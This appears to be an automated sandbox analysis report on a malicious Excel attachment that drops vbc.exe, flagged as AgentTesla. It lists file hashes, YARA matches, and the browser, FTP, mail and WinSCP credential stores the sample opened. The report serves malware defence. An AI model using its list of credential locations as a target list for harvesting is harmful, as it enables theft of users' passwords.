Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3662578.5.raw.unpack, type: UNPACKEDPE

ID:	385366
Product:	CloudBasic
Start time:	11:33:40
Start date:	12.04.2021
Sample:	ORDER 9387383900.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	6cd928e3be0956061f518082a5acb60b
SHA1:	0e377a42bd4197fceb15e458ccfb46445e7f0132
SHA256:	19a975e2303b2394ab8ec3550799702b6a6a1eb166c588e90619e2c117baf73f
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	ABEB7AA739C4F99C996B91E51A1FA885	A0DBD11A666DBA40556F7131D5845A061769A62F	428039D6537A6684C3825BC678F9939754A71E346A8BF5D50B9DABFDCE19ACFF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CF4807.png	PNG image data, 294 x 262, 8-bit/color RGBA, non-interlaced	4BE445245B4530E9136AA45ECC8D18FB	83810AE3E998B2EDD2FCB72A19E558D7D8E334B4	5521F2BF794D82C2C2638841118176A4D1924F049A1F545E1C4E85F375021783
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45AE4F8B.png	PNG image data, 294 x 262, 8-bit/color RGBA, non-interlaced	4BE445245B4530E9136AA45ECC8D18FB	83810AE3E998B2EDD2FCB72A19E558D7D8E334B4	5521F2BF794D82C2C2638841118176A4D1924F049A1F545E1C4E85F375021783
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C9F6B5.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	4FA847E6C8056B31A5F0F4B7C3D9CCF6	597549E70D2C312DD28DAC68E8E6BC4AF7ACCCE2	ACAF685D01DFC758C527F08DAD673786202110469428637D26A53FA964FBEF95
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C21E6C10.jpeg	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3	AA7A56E6A97FFA9390DA10A2EC0C5805	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D0E8725C.jpeg	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3	AA7A56E6A97FFA9390DA10A2EC0C5805	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3AA532.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	C4321C85D61A995BB80A5ECD394CC221	F361F7AFAB356415EC6655DC637553BE174567F7	C22EED7CE47FE475B4765D04D44DC31A54D70ECDEBF42683F24AFED854A9C51E
C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd	data	4F3F9FDF02EDABE0217F80DAEB24F300	3AE00A6FE91DA38202C32F516E63D27F7B48F032	96875F8F702463D54345CCC3AE6442E40DB78C03A9B504F45CB9F3A59713FD35
C:\Users\user\Desktop\~$ORDER 9387383900.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	ABEB7AA739C4F99C996B91E51A1FA885	A0DBD11A666DBA40556F7131D5845A061769A62F	428039D6537A6684C3825BC678F9939754A71E346A8BF5D50B9DABFDCE19ACFF

Analysis Report ORDER 9387383900.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs